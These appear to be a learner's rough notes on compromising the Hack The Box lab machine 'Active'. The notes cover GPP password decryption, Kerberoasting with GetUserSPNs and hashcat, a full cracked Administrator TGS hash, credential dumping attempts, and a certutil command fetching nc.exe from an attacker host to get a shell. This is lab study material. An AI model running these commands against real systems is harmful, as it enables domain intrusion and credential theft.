Active

SMB

enumeration, we get GPP password. Crack it:

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

GPPstillStandingStrong2k18

User was:

name="active.htb\SVC_TGS"

Where did I find this file on SMB?

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>

Mistake here**** Not recursive work

Try new user with crackmapexec (cme)?

cme smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --local-auth --shares

psexec?

psexec.py active.htb\SVC_TGS:'GPPstillStandingStrong2k18'@10.10.10.100

it’s a TGS. Kerberoast?

sudo GetUserSPNs.py active.htb\SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

mistake********* backslash instead of frontslash and took forever to figure out

CORRECT command that gave us the admin hash:

sudo GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

how the write up did it:

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs

hash:

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$e88b68ff63f53bdb10276ebfb67bb034$da1390587bbd0b69c6be35c11e18de34b54d9d7da0c2cc65b43c7727fd02013d4d984ab2f1a868d1bd3095181d31befe01aeb2f1b54377f7511d2022eb1df2e0f386b658491609c7a8d9d88e7daaaf71d5e6c00354739f3ddec9e116b1230d745338031f451f87cb146290789b7204e6363d189142fd4398faa22d39ac38f7da25a6ee825fa3931be33b20a82923e47c6e5dee5e3314940cd4540c67a13082d06569869128e17aa842dc1bc80e24f0bf602c041e098135cce26f69fb447e14ec87cd7b1cad4bd76444ea913c1f24e0713916bf683e28d9f8381cdd0cf3abf9cc6ed1f295a1bc3bb68e1bdac5f41355616824aee80c1ed9944b60c016ed3ba592cf48c396071f2669d06d7da3039171a6fa3d8b855a0585cd0b9af5f9b9942f1fc6cdbb410a5f43b33024cde27f465ff58296f3e2c1ad2221ab7abd486921bf85fab8cb0e3ef306799db8784bc917480a56859e762bf7c86ebfd7a42e32ab806343fe28a0a7cb8c7388ffc645c14a0c71f4d080d73216971dbc15ed9d80defb2e0dc3575ca94d5a2728c7aa7df273d5498a6a77aadd625f6d213410fd5aa235176e8769115ab4238e5aa94d5e76da0fe6afbca5196a0486bc46670bf6dd85be724a40c570494e2cb103d06749e41c9343155373063fc2501cb4fd23f08e887eaef0724eb28bc4572e5c842c2483347d7cbbdf4bdf5111d62d712d3d86593f2851b3d84fab941d8d8391066ba6422145dffc8c57ade6f45a791994cb995047056846aacde6bd42df34930e98739bff743ab52de42b7e937616d5bd61cd764b557c79ccc6ebe6df1fbd903cb6201a4c491aefc52755663cca0a9a343981082609fab1ca1b5908520ec828ae0bd4c58d5d51de786815e9f1cd44f0ba24e901a73faa102cbf833f9cc525f40871ee2a6d1c74148cd77bbf919231ab92467d7ff467db1094eb6c47b440623e41226fec37f74dac203db48e65dd9aeede9674776dda371a20459c463225448ce93e14f5823536dd35e29b912d1f7eb892893f58c9649e48f303dee63e3e6a4b5a9b0029cd04b47c601f9e4700ce57dded607e6e0c352234c28c05359bba821f0c1a0d293bcdac26a9873366baa861d90a6d5dc538d180974aa9a034ceae90581f3a6ab4f37cb17958fa685d3e6f898fc2ecafe5c898454338fe545f89da02e07608a77ccfc60c8f2f47830737de0de3b9368eeb587535b1545cd6ad36ad5588e985876335c348ee3569c753c6337a1507

dump SAM:

cme smb 10.10.10.100 -u 'SVC_TGS' -d active.htb -p GPPstillStandingStrong2k18 --local-auth --sam

nothing

Hashcat for kerberoasting:

hashcat -m 7500 activeKerb.txt rockyou.txt -O

Cracked!

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$e88b68ff63f53bdb10276ebfb67bb034$da1390587bbd0b69c6be35c11e18de34b54d9d7da0c2cc65b43c7727fd02013d4d984ab2f1a868d1bd3095181d31befe01aeb2f1b54377f7511d2022eb1df2e0f386b658491609c7a8d9d88e7daaaf71d5e6c00354739f3ddec9e116b1230d745338031f451f87cb146290789b7204e6363d189142fd4398faa22d39ac38f7da25a6ee825fa3931be33b20a82923e47c6e5dee5e3314940cd4540c67a13082d06569869128e17aa842dc1bc80e24f0bf602c041e098135cce26f69fb447e14ec87cd7b1cad4bd76444ea913c1f24e0713916bf683e28d9f8381cdd0cf3abf9cc6ed1f295a1bc3bb68e1bdac5f41355616824aee80c1ed9944b60c016ed3ba592cf48c396071f2669d06d7da3039171a6fa3d8b855a0585cd0b9af5f9b9942f1fc6cdbb410a5f43b33024cde27f465ff58296f3e2c1ad2221ab7abd486921bf85fab8cb0e3ef306799db8784bc917480a56859e762bf7c86ebfd7a42e32ab806343fe28a0a7cb8c7388ffc645c14a0c71f4d080d73216971dbc15ed9d80defb2e0dc3575ca94d5a2728c7aa7df273d5498a6a77aadd625f6d213410fd5aa235176e8769115ab4238e5aa94d5e76da0fe6afbca5196a0486bc46670bf6dd85be724a40c570494e2cb103d06749e41c9343155373063fc2501cb4fd23f08e887eaef0724eb28bc4572e5c842c2483347d7cbbdf4bdf5111d62d712d3d86593f2851b3d84fab941d8d8391066ba6422145dffc8c57ade6f45a791994cb995047056846aacde6bd42df34930e98739bff743ab52de42b7e937616d5bd61cd764b557c79ccc6ebe6df1fbd903cb6201a4c491aefc52755663cca0a9a343981082609fab1ca1b5908520ec828ae0bd4c58d5d51de786815e9f1cd44f0ba24e901a73faa102cbf833f9cc525f40871ee2a6d1c74148cd77bbf919231ab92467d7ff467db1094eb6c47b440623e41226fec37f74dac203db48e65dd9aeede9674776dda371a20459c463225448ce93e14f5823536dd35e29b912d1f7eb892893f58c9649e48f303dee63e3e6a4b5a9b0029cd04b47c601f9e4700ce57dded607e6e0c352234c28c05359bba821f0c1a0d293bcdac26a9873366baa861d90a6d5dc538d180974aa9a034ceae90581f3a6ab4f37cb17958fa685d3e6f898fc2ecafe5c898454338fe545f89da02e07608a77ccfc60c8f2f47830737de0de3b9368eeb587535b1545cd6ad36ad5588e985876335c348ee3569c753c6337a1507:Ticketmaster1968

New credentials:

Administartor:Ticketmaster1968

secretsdump?

secretsdump.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18'@10.10.10.100

connect to shares again as service:

smbclient \\\\10.10.10.100\\Users -U SVC_TGS%GPPstillStandingStrong2k18

running shell command on smb:

!shellcommand
!whoami

Move over netcat for shell?

certutil -urlcache -f http://10.10.14.19:8080/nc.exe nc.exe

doesn’t let us with certutil. Try curl?